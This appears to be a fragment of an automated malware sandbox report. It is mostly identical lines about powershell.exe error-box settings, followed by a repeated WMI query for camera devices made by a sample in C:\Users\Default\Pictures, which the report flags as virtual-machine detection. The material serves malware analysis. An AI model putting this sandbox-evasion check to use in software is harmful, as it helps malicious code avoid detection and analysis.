Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
